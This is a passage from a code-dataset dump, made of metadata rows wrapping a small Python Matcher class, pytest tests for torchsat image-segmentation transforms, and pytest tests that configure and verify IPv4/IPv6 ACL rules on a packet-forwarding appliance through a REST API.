| 35.267677 | 88 | 0.6649 | 836 | 6,983 | 5.269139 | 0.138756 | 0.059024 | 0.044495 | 0.054484 | 0.817934 | 0.804313 | 0.801816 | 0.73916 | 0.73916 | 0.73916 | 0 | 0.004881 | 0.237147 | 6,983 | 197 | 89 | 35.446701 | 0.822039 | 0.081913 | 0 | 0.603053 | 0 | 0 | 0.079163 | 0.015581 | 0 | 0 | 0 | 0 | 0.061069 | 1 | 0.061069 | false | 0 | 0.045802 | 0 | 0.21374 | 0.045802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
18599c0d366542d35ab2d41e8232ab3f7cc61859 | 105 | py | Python | tests/util/matcher.py | andybalaam/cell | 03d0670f9ebd513a983b9327108a84f2eff8ee75 | [
"MIT"
] | 118 | 2016-10-17T09:04:42.000Z | 2021-12-31T03:00:55.000Z | tests/util/matcher.py | JoeyCluett/cell | a3203731e0c63a55955509e843fb99e38cf7cc7c | [
"MIT"
] | 4 | 2019-01-23T09:59:43.000Z | 2020-11-02T11:00:38.000Z | tests/util/matcher.py | JoeyCluett/cell | a3203731e0c63a55955509e843fb99e38cf7cc7c | [
"MIT"
] | 21 | 2016-06-05T08:05:53.000Z | 2022-01-29T10:08:47.000Z |
class Matcher:
@staticmethod
def required_members():
return ["matches", "description"]
| 15 | 41 | 0.638095 | 9 | 105 | 7.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.247619 | 105 | 6 | 42 | 17.5 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0.173077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
a1335302e7f85ee6f5089b86ea16c74c1076b25f | 14,179 | py | Python | tests/test_transform_seg.py | avinash-chouhan/torchsat | e001047667702aa1d1daae78b901e002c428c0f2 | [
"MIT"
] | 1 | 2019-10-20T13:51:30.000Z | 2019-10-20T13:51:30.000Z | tests/test_transform_seg.py | avinash-chouhan/torchsat | e001047667702aa1d1daae78b901e002c428c0f2 | [
"MIT"
] | null | null | null | tests/test_transform_seg.py | avinash-chouhan/torchsat | e001047667702aa1d1daae78b901e002c428c0f2 | [
"MIT"
] | 1 | 2019-10-19T17:20:43.000Z | 2019-10-19T17:20:43.000Z | from pathlib import Path
import math
import numpy as np
import pytest
import tifffile
import torch
from PIL import Image
from torchsat.transforms import transforms_seg
tiff_files = [
'./tests/fixtures/different-types/tiff_1channel_float.tif',
'./tests/fixtures/different-types/tiff_1channel_uint16.tif',
'./tests/fixtures/different-types/tiff_1channel_uint8.tif',
'./tests/fixtures/different-types/tiff_3channel_float.tif',
'./tests/fixtures/different-types/tiff_3channel_uint16.tif',
'./tests/fixtures/different-types/tiff_3channel_uint8.tif',
'./tests/fixtures/different-types/tiff_8channel_float.tif',
'./tests/fixtures/different-types/tiff_8channel_uint16.tif',
'./tests/fixtures/different-types/tiff_8channel_uint8.tif',
]
jpeg_files = [
'./tests/fixtures/different-types/jpeg_1channel_uint8.jpeg',
'./tests/fixtures/different-types/jpeg_3channel_uint8.jpeg',
'./tests/fixtures/different-types/jpeg_1channel_uint8.png',
'./tests/fixtures/different-types/jpeg_3channel_uint8.png',
]
mask_file = './tests/fixtures/masks/mask_tiff_3channel_uint8.png'
def read_img(fp):
if Path(fp).suffix in ['.tif', '.tiff']:
img = tifffile.imread(fp)
else:
img = np.array(Image.open(fp))
return img
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_ToTensor(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.ToTensor()
])(img, mask)
assert type(result_img) == torch.Tensor
assert len(result_img.shape) == 3
assert result_img.shape[1:3] == img.shape[0:2]
assert type(result_mask) == torch.Tensor
assert torch.all(torch.unique(result_mask) == torch.tensor([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_Normalize(fp):
img = read_img(fp)
mask = read_img(mask_file)
channels = 1 if img.ndim==2 else img.shape[2]
mean = [img.mean()] if channels==1 else np.array(img.mean(axis=(0, 1))).tolist()
std = [img.std()] if channels==1 else np.array(img.std(axis=(0, 1))).tolist()
result_img, result_mask = transforms_seg.Compose([
transforms_seg.ToTensor(),
transforms_seg.Normalize(mean, std)
])(img, mask)
assert type(result_img) == torch.Tensor
assert len(result_img.shape) == 3
assert result_img.shape[1:3] == img.shape[0:2]
assert type(result_mask) == torch.Tensor
assert torch.all(torch.unique(result_mask) == torch.tensor([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_ToGray(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.ToGray()
])(img, mask)
assert result_img.dtype == img.dtype
assert result_img.ndim == 2
result_img, result_mask = transforms_seg.Compose([
transforms_seg.ToGray(output_channels=5)
])(img, mask)
assert result_img.shape == (img.shape[0], img.shape[1], 5)
assert result_img.dtype == img.dtype
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_GaussianBlur(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.GaussianBlur(kernel_size=5)
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomNoise(fp):
img = read_img(fp)
mask = read_img(mask_file)
for item in ['gaussian', 'salt', 'pepper', 's&p']:
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomNoise(mode=item)
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomBrightness(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomBrightness()
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomBrightness(max_value=10)
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
if result_img.ndim == 2:
assert abs(float(result_img[0,0]) - float(img[0,0])) <=10
else:
assert abs(float(result_img[0,0,0]) - float(img[0,0,0])) <=10
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomContrast(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomContrast()
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomContrast(max_factor=1.2)
])(img, mask)
assert result_img.shape == img.shape
assert result_img.dtype == img.dtype
if result_img.ndim == 2:
assert abs(float(result_img[0,0]) / float(img[0,0])) <=1.2
else:
assert abs(float(result_img[0,0,0]) / float(img[0,0,0])) <=1.2
assert result_mask.dtype == mask.dtype
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_Resize(fp):
img = read_img(fp)
mask = read_img(mask_file)
assert mask.shape == (650,500)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.Resize(300),
transforms_seg.ToTensor(),
])(img, mask)
assert result_mask.shape == torch.Size([300, 300])
assert type(result_mask) == torch.Tensor
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
result_img, result_mask = transforms_seg.Compose([
transforms_seg.Resize(833),
])(img, mask)
assert result_mask.shape[0:2] == (833, 833)
assert result_mask.dtype == mask.dtype
result_img, result_mask = transforms_seg.Compose([
transforms_seg.Resize((500,300)),
])(img, mask)
assert result_mask.shape[0:2] == (500, 300)
assert result_mask.dtype == mask.dtype
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_CenterCrop(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.Compose([
transforms_seg.CenterCrop(300),
])(img, mask)
assert result_mask.shape[0:2] == (300,300)
assert result_mask.dtype == mask.dtype
result_img, result_mask = transforms_seg.Compose([
transforms_seg.CenterCrop((500,300)),
])(img, mask)
assert result_mask.shape[0:2] == (500,300)
assert result_mask.dtype == mask.dtype
with pytest.raises(ValueError) as excinfo:
transforms_seg.CenterCrop(1000)(img, mask)
assert 'the output_size should' in str(excinfo.value)
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_Pad(fp):
img = read_img(fp)
mask = read_img(mask_file)
# constant value
result_img, result_mask = transforms_seg.Pad(10, fill=1)(img, mask)
if result_mask.ndim == 2:
assert result_mask[0,0] == 0
else:
assert result_mask[0,0,0] == 0
# reflect value
result_img, result_mask = transforms_seg.Pad(20, padding_mode='reflect')(img, mask)
assert result_mask.shape[0:2] == (mask.shape[0]+40, mask.shape[1]+40)
assert result_mask[0,0] == mask[20,20]
assert result_mask.dtype == mask.dtype
# all padding mode methods
for item in ['reflect','edge','linear_ramp','maximum', 'mean' , 'median', 'minimum', 'symmetric', 'wrap']:
# for item in ['edge']:
result_img, result_mask = transforms_seg.Pad(10, padding_mode=item)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == (mask.shape[0]+20, mask.shape[1]+20)
result_img, result_mask = transforms_seg.Pad((10,20), padding_mode=item)(img, mask)
assert result_mask.shape[0:2] == (mask.shape[0]+40, mask.shape[1]+20)
assert result_mask.dtype == mask.dtype
result_img, result_mask = transforms_seg.Pad((10,20,30,40), padding_mode=item)(img, mask)
assert result_mask.shape[0:2] == (mask.shape[0]+60, mask.shape[1]+40)
assert result_mask.dtype == mask.dtype
result_img, result_mask = transforms_seg.Compose([
transforms_seg.Pad(10, fill=1),
transforms_seg.ToTensor()
])(img,mask)
assert type(result_mask) == torch.Tensor
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomCrop(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomCrop(111)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == (111,111)
result_img, result_mask = transforms_seg.RandomCrop((100, 200))(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == (100,200)
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomHorizontalFlip(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomHorizontalFlip(p=1)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
if result_mask.ndim == 2:
height, width = mask.shape
assert result_mask[height-1,0] == mask[0,0]
else:
height, width, depth = mask.shape
assert (result_mask[height-1,0,:] == mask[0,0,:]).any() == True
# tensor
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomHorizontalFlip(p=1),
transforms_seg.ToTensor()
])(img, mask)
assert type(result_mask) == torch.Tensor
assert result_mask.shape[0:2] == mask.shape[0:2]
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomVerticalFlip(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomVerticalFlip(p=1)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
if result_mask.ndim == 2:
height, width = mask.shape
assert result_mask[0,width-1] == mask[0,0]
else:
height, width, depth = mask.shape
assert (result_mask[0,width-1,:] == mask[0,0,:]).any() == True
# tensor
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomVerticalFlip(p=1),
transforms_seg.ToTensor()
])(img, mask)
assert type(result_mask) == torch.Tensor
assert result_mask.shape[0:2] == mask.shape[0:2]
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomFlip(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomFlip(p=0)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
if result_mask.ndim == 2:
height, width = mask.shape
assert result_mask[0,0] == mask[0,0]
else:
height, width, depth = mask.shape
assert (result_mask[0,0,:] == mask[0,0,:]).any() == True
# tensor
result_img, result_mask = transforms_seg.Compose([
transforms_seg.RandomFlip(p=0.1),
transforms_seg.ToTensor()
])(img, mask)
assert type(result_mask) == torch.Tensor
assert result_mask.shape[0:2] == mask.shape[0:2]
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomResizedCrop(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomResizedCrop((500,300), 300)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == (300,300)
result_img, result_mask = transforms_seg.RandomResizedCrop(500, (500,300))(img, mask)
assert result_mask.shape[0:2] == (500,300)
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_ElasticTransform(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.ElasticTransform()(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomRotation(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomRotation(45)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
result_img, result_mask = transforms_seg.RandomRotation((-10, 30))(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
result_img, result_mask = transforms_seg.RandomRotation((-10, 30), center=(200,250))(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2]
assert np.all(np.unique(result_mask) == np.array([0,1,2,3])) == True
@pytest.mark.parametrize('fp', tiff_files+jpeg_files)
def test_RandomShift(fp):
img = read_img(fp)
mask = read_img(mask_file)
result_img, result_mask = transforms_seg.RandomShift(max_percent=0.1)(img, mask)
assert result_mask.dtype == mask.dtype
assert result_mask.shape[0:2] == mask.shape[0:2] | 36.07888 | 110 | 0.678891 | 2,075 | 14,179 | 4.447711 | 0.06988 | 0.127858 | 0.102286 | 0.074114 | 0.875068 | 0.860548 | 0.843537 | 0.759562 | 0.728356 | 0.710153 | 0 | 0.036568 | 0.176458 | 14,179 | 393 | 111 | 36.07888 | 0.75379 | 0.006771 | 0 | 0.631746 | 0 | 0 | 0.066638 | 0.055698 | 0 | 0 | 0 | 0 | 0.336508 | 1 | 0.060317 | false | 0 | 0.025397 | 0 | 0.088889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a163f3caea9c9e79bd126d24b1dab32f012fe810 | 16,016 | py | Python | auto-test/tapplet/acl/acl_se_test.py | asterfusion/Tapplet | 917020fce2aaa2678c36a91fb91f60b36142ad9e | [
"Apache-2.0"
] | 1 | 2019-12-30T11:49:35.000Z | 2019-12-30T11:49:35.000Z | auto-test/tapplet/acl/acl_se_test.py | asterfusion/Tapplet | 917020fce2aaa2678c36a91fb91f60b36142ad9e | [
"Apache-2.0"
] | null | null | null | auto-test/tapplet/acl/acl_se_test.py | asterfusion/Tapplet | 917020fce2aaa2678c36a91fb91f60b36142ad9e | [
"Apache-2.0"
] | null | null | null | # -*- coding: UTF-8 -*-
from tools.conftest_tools import *
from tools.rest_tools import *
from tools.tcpreplay_tools import *
from pytest_main import port1_config
from pytest_main import port2_config
from pytest_main import device_config
from pytest_main import global_verbose
from pytest_main import sf_helper
from scapy.all import *
import time
pkts_dir = "./tapplet/acl/pkts/"
config_needed = []
stat_target = []
pkts = []
ipv4_2048_json_file = "./tapplet/acl/json/2048_64_tcp_acl.json"
ipv4_2048_pcap_file = "2048x5_64_tcp_acl_pkt.pcap"
ipv6_2048_json_file = "./tapplet/acl/json/2048_128_ip6_tcp_acl.json"
ipv6_2048_pcap_file = "2048x5_128_ip6_tcp_acl_pkt.pcap"
sleep_time = 5
def check_acl_stat(rest_helper , group_id , rule_id , target_count , is_ipv6 = False , localverbose = False):
param = {"group" : str(group_id) , "index" : str(rule_id)}
ret = rest_helper.auto_run_no_login("acl/stat", GlobalRestValue.ACTION_GET ,
params = param , verbose = localverbose)
assert ret[0] == 0
group_str = "group_{0}".format(group_id)
count = ret[1][group_str][str(rule_id)]
assert int(count) == target_count
def check_acl_stat_no_assert(rest_helper , group_id , rule_id , target_count , is_ipv6 = False , localverbose = False):
param = {"group" : str(group_id) , "index" : str(rule_id)}
ret = rest_helper.auto_run_no_login("acl/stat", GlobalRestValue.ACTION_GET ,
params = param , verbose = localverbose)
if ret[0] != 0 :
return rule_id
group_str = "group_{0}".format(group_id)
count = ret[1][group_str][str(rule_id)]
if int(count) != target_count:
return rule_id
return None
def set_acl_sync(rest_helper):
data = [ {"op" : "replace" , "path" : "/" , "value" : 1}]
ret = rest_helper.auto_run_no_login("acl/sync", GlobalRestValue.ACTION_PATCH ,
data = data , verbose = global_verbose)
assert ret[0] == 0
time.sleep(4)
def delete_acl_config(rest_helper , group_id , rule_id):
param = {"group" : str(group_id) , "index" : str(rule_id)}
ret = rest_helper.auto_run_no_login("acl/config", GlobalRestValue.ACTION_DELETE ,
params = param , verbose = global_verbose)
assert ret[0] == 0
def test_single_outer_ipv4_acl():
'''
单条ipv4 acl测试
'''
## clean config needed
config_needed.clear()
stat_target.clear()
pkts.clear()
## add config needed
interface_config = {
port1_config :{
"admin_status":1,
"ingress_config":{
"rule_to_action":{
"4":1
},
}
}
}
action_config = {
"1":{
"basis_actions":
{
"type": "forward",
"interfaces": [port1_config],
"load_balance_weight": "",
"load_balance_mode": ""
}
}
}
acl_config = {
"group_1":
{
"4":
{
"rule_type":"tuple4",
"rule_cfg":{
"dip":"10.10.10.123",
"dip_mask":24,
"dport_max":62223,
"dport_min":62223,
"proto_max":6,
"proto_min":6,
"sip":"10.0.39.95",
"sip_mask":24,
"sport_max":62251,
"sport_min":62251,
}
}
}
}
action_config["1"]["basis_actions"]["interfaces"] = [ port1_config ]
## add stat target
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "in_packets" , 1 , port1_config)
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "out_packets" , 1 , port1_config)
## add pkts
# pkts.append("cre_upd_del_sig.pcap")
###### start test #######
# check if vpp is down
check_vpp_stat(sf_helper)
# clean up all config
reset_all_mod_config(sf_helper)
# dispatch config
dispatch_test_config(sf_helper , config_needed)
dispatch_put_config(sf_helper , "actions" , action_config)
dispatch_put_config(sf_helper , "acl/config" , acl_config)
dispatch_put_config(sf_helper , "interfaces/config" , interface_config)
set_acl_sync(sf_helper)
# clean stat
clean_target_stat(sf_helper , "interfaces/stat/" + port1_config)
clean_target_stat(sf_helper , "acl/stat")
# send pkts
send_all_pkts(pkts_dir , ["ip4_tcp_100B.pcap"])
time.sleep(sleep_time)
# check stat
check_test_stat(sf_helper , stat_target)
check_acl_stat(sf_helper , 1 , 4 , 1 , localverbose=global_verbose)
# check if vpp is down
check_vpp_stat(sf_helper)
def test_single_outer_ipv6_acl():
'''
单条ipv6 acl测试
'''
## clean config needed
config_needed.clear()
stat_target.clear()
pkts.clear()
## add config needed
interface_config = {
port1_config :{
"admin_status":1,
"ingress_config":{
"rule_to_action":{
"4":1
},
},
"interface_type":"normal"
}
}
action_config = {
"1":{
"basis_actions":
{
"type": "forward",
"interfaces": [port1_config],
"load_balance_weight": "",
"load_balance_mode": ""
}
}
}
acl_config = {
"group_1":
{
"4":
{
"rule_type":"tuple6",
"rule_cfg":{
"dip":"2409:8801:b00:8859:1c2c:6f74:6eeb:48e3",
"dip_mask":128,
"dport_max":0,
"dport_min":0,
"proto_max":50,
"proto_min":50,
"sip":"2409:8011:a60:5::",
"sip_mask":128,
"sport_max":0,
"sport_min":0,
},
}
}
}
action_config["1"]["basis_actions"]["interfaces"] = [ port1_config ]
## add stat target
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "in_packets" , 1 , port1_config)
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "out_packets" , 1 , port1_config)
## add pkts
# pkts.append("cre_upd_del_sig.pcap")
###### start test #######
# check if vpp is down
check_vpp_stat(sf_helper)
# clean up all config
reset_all_mod_config(sf_helper)
# dispatch config
dispatch_test_config(sf_helper , config_needed)
dispatch_put_config(sf_helper , "actions" , action_config)
dispatch_put_config(sf_helper , "acl/config" , acl_config)
dispatch_put_config(sf_helper , "interfaces/config" , interface_config)
set_acl_sync(sf_helper)
# clean stat
clean_target_stat(sf_helper , "interfaces/stat/" + port1_config)
clean_target_stat(sf_helper , "acl/stat")
# send pkts
send_all_pkts(pkts_dir , ["ipv6.pcap"])
time.sleep(sleep_time)
# check stat
check_test_stat(sf_helper , stat_target)
check_acl_stat(sf_helper , 1 , 4 , 1 , is_ipv6 =True, localverbose=global_verbose)
# check if vpp is down
check_vpp_stat(sf_helper)
def test_acl_two_rule_match():
'''
一个报文可以命中两条规则,但只返回优先级高(序号更小)的那条
'''
## clean config needed
config_needed.clear()
stat_target.clear()
pkts.clear()
## add config needed
interface_config = {
port1_config:{
"admin_status":1,
"ingress_config":{
"rule_to_action":{
"4":1
},
},
}
}
action_config = {
"1":{
"basis_actions":
{
"type": "forward",
"interfaces": [port1_config],
"load_balance_weight": "",
"load_balance_mode": ""
}
}
}
acl_config_1 = {
"group_1":
{
"1":
{
"rule_type":"tuple4",
"rule_cfg":{
"dip":"10.10.10.123",
"dip_mask":24,
"dport_max":62223,
"dport_min":62223,
"proto_max":6,
"proto_min":6,
"sip":"10.0.39.95",
"sip_mask":24,
"sport_max":62251,
"sport_min":62251,
},
}
}
}
acl_config_2 = {
"group_1":
{
"5":
{
"rule_type":"tuple4",
"rule_cfg":{
"dip":"10.10.10.123",
"dip_mask":24,
"dport_max":62223,
"dport_min":0,
"proto_max":6,
"proto_min":0,
"sip":"10.0.39.95",
"sip_mask":24,
"sport_max":62251,
"sport_min":0,
},
}
}
}
acl_config_3 = {
"group_1":
{
"4":
{
"rule_type":"tuple4",
"rule_cfg":{
"dip":"10.10.10.123",
"dip_mask":24,
"dport_max":65535,
"dport_min":62223,
"proto_max":255,
"proto_min":6,
"sip":"10.0.39.95",
"sip_mask":24,
"sport_max":65535,
"sport_min":62251,
},
}
}
}
action_config["1"]["basis_actions"]["interfaces"] = [ port1_config ]
## add stat target
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "in_packets" , 1 , port1_config)
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "out_packets" , 1 , port1_config)
## add pkts
# pkts.append("cre_upd_del_sig.pcap")
###### start test #######
# check if vpp is down
check_vpp_stat(sf_helper)
# clean up all config
reset_all_mod_config(sf_helper)
# dispatch config
dispatch_test_config(sf_helper , config_needed)
dispatch_put_config(sf_helper , "actions" , action_config)
dispatch_put_config(sf_helper , "acl/config" , acl_config_1)
dispatch_put_config(sf_helper , "acl/config" , acl_config_3)
delete_acl_config(sf_helper , 1 , 1 )
dispatch_put_config(sf_helper , "acl/config" , acl_config_2)
dispatch_put_config(sf_helper , "interfaces/config" , interface_config)
set_acl_sync(sf_helper)
# clean stat
clean_target_stat(sf_helper , "interfaces/stat/" + port1_config)
clean_target_stat(sf_helper , "acl/stat")
# send pkts
send_all_pkts(pkts_dir , ["ip4_tcp_100B.pcap"])
time.sleep(sleep_time)
# check stat
check_test_stat(sf_helper , stat_target)
check_acl_stat(sf_helper , 1 , 4 , 1, localverbose=global_verbose)
check_acl_stat(sf_helper , 1 , 5 , 0, localverbose=global_verbose)
# check if vpp is down
check_vpp_stat(sf_helper)
def test_full_outer_ipv4_acl():
'''
2048条ipv4 acl测试
'''
## clean config needed
config_needed.clear()
stat_target.clear()
pkts.clear()
## add config needed
interface_config = {
port1_config :{
"admin_status":1,
"ingress_config":{
"rule_to_action":{
},
}
}
}
for i in range(1 , 2048 + 1):
interface_config[port1_config]["ingress_config"]["rule_to_action"].update({str(i) : 1})
action_config = {
"1":{
"basis_actions":
{
"type": "forward",
"interfaces": [port1_config],
"load_balance_weight": "",
"load_balance_mode": ""
}
}
}
acl_config = {}
with open(ipv4_2048_json_file, "r") as post_config:
acl_config = json.load(post_config)
action_config["1"]["basis_actions"]["interfaces"] = [ port1_config ]
## add stat target
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "in_packets" , 10240 , port1_config)
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "out_packets" , 10240 , port1_config)
###### start test #######
# check if vpp is down
check_vpp_stat(sf_helper)
# clean up all config
reset_all_mod_config(sf_helper)
# dispatch config
dispatch_test_config(sf_helper , config_needed)
dispatch_put_config(sf_helper , "actions" , action_config)
dispatch_put_config(sf_helper , "acl/config" , acl_config)
dispatch_put_config(sf_helper , "interfaces/config" , interface_config)
set_acl_sync(sf_helper)
# clean stat
clean_target_stat(sf_helper , "interfaces/stat/" + port1_config)
clean_target_stat(sf_helper , "acl/stat")
# send pkts
send_all_pkts(pkts_dir , [ipv4_2048_pcap_file])
time.sleep(sleep_time)
# check stat
check_test_stat(sf_helper , stat_target)
failed_list = []
for i in range(1 , 2048+1):
ret = check_acl_stat_no_assert(sf_helper , 1 , i , 5 , localverbose=global_verbose)
if ret != None:
failed_list.append(i)
for i in failed_list:
check_acl_stat(sf_helper , 1 , i , 5 , localverbose=global_verbose)
# check if vpp is down
check_vpp_stat(sf_helper)
def test_full_outer_ipv6_acl():
'''
2048条ipv6 acl测试
'''
## clean config needed
config_needed.clear()
stat_target.clear()
pkts.clear()
## add config needed
interface_config = {
port1_config :{
"admin_status":1,
"ingress_config":{
"rule_to_action":{
},
}
}
}
for i in range(1 , 2048 + 1):
interface_config[port1_config]["ingress_config"]["rule_to_action"].update({str(i) : 1})
action_config = {
"1":{
"basis_actions":
{
"type": "forward",
"interfaces": [port1_config],
"load_balance_weight": "",
"load_balance_mode": ""
}
}
}
acl_config = {}
with open(ipv6_2048_json_file, "r") as post_config:
acl_config = json.load(post_config)
action_config["1"]["basis_actions"]["interfaces"] = [ port1_config ]
## add stat target
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "in_packets" , 10240 , port1_config)
append_stat_target(stat_target , "interfaces/stat/"+port1_config , "out_packets" , 10240 , port1_config)
###### start test #######
# check if vpp is down
check_vpp_stat(sf_helper)
# clean up all config
reset_all_mod_config(sf_helper)
# dispatch config
dispatch_test_config(sf_helper , config_needed)
dispatch_put_config(sf_helper , "actions" , action_config)
dispatch_put_config(sf_helper , "acl/config" , acl_config)
dispatch_put_config(sf_helper , "interfaces/config" , interface_config)
set_acl_sync(sf_helper)
# clean stat
clean_target_stat(sf_helper , "interfaces/stat/" + port1_config)
clean_target_stat(sf_helper , "acl/stat")
# send pkts
send_all_pkts(pkts_dir , [ipv6_2048_pcap_file])
time.sleep(sleep_time)
# check stat
check_test_stat(sf_helper , stat_target)
failed_list = []
for i in range(1 , 2048+1):
ret = check_acl_stat_no_assert(sf_helper , 1 , i , 5 , localverbose=global_verbose)
if ret != None:
failed_list.append(i)
for i in failed_list:
check_acl_stat(sf_helper , 1 , i , 5 , localverbose=global_verbose)
# check if vpp is down
check_vpp_stat(sf_helper)
| 25.87399 | 119 | 0.556444 | 1,852 | 16,016 | 4.453024 | 0.097732 | 0.064993 | 0.045107 | 0.039166 | 0.877774 | 0.8591 | 0.854371 | 0.839578 | 0.83594 | 0.83594 | 0 | 0.044881 | 0.326673 | 16,016 | 618 | 120 | 25.915858 | 0.719863 | 0.070929 | 0 | 0.645244 | 0 | 0 | 0.157654 | 0.012138 | 0 | 0 | 0 | 0 | 0.017995 | 1 | 0.023136 | false | 0 | 0.025707 | 0 | 0.056555 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a164aeb9d6d15b7ef8f34fea4d793f7e9d1060e5 | 74 | py | Python | hermes/api.py | LaudateCorpus1/hermes-10 | 63a5afcafe90ca99aeb44edeee9ed6f90baae431 | [
"0BSD"
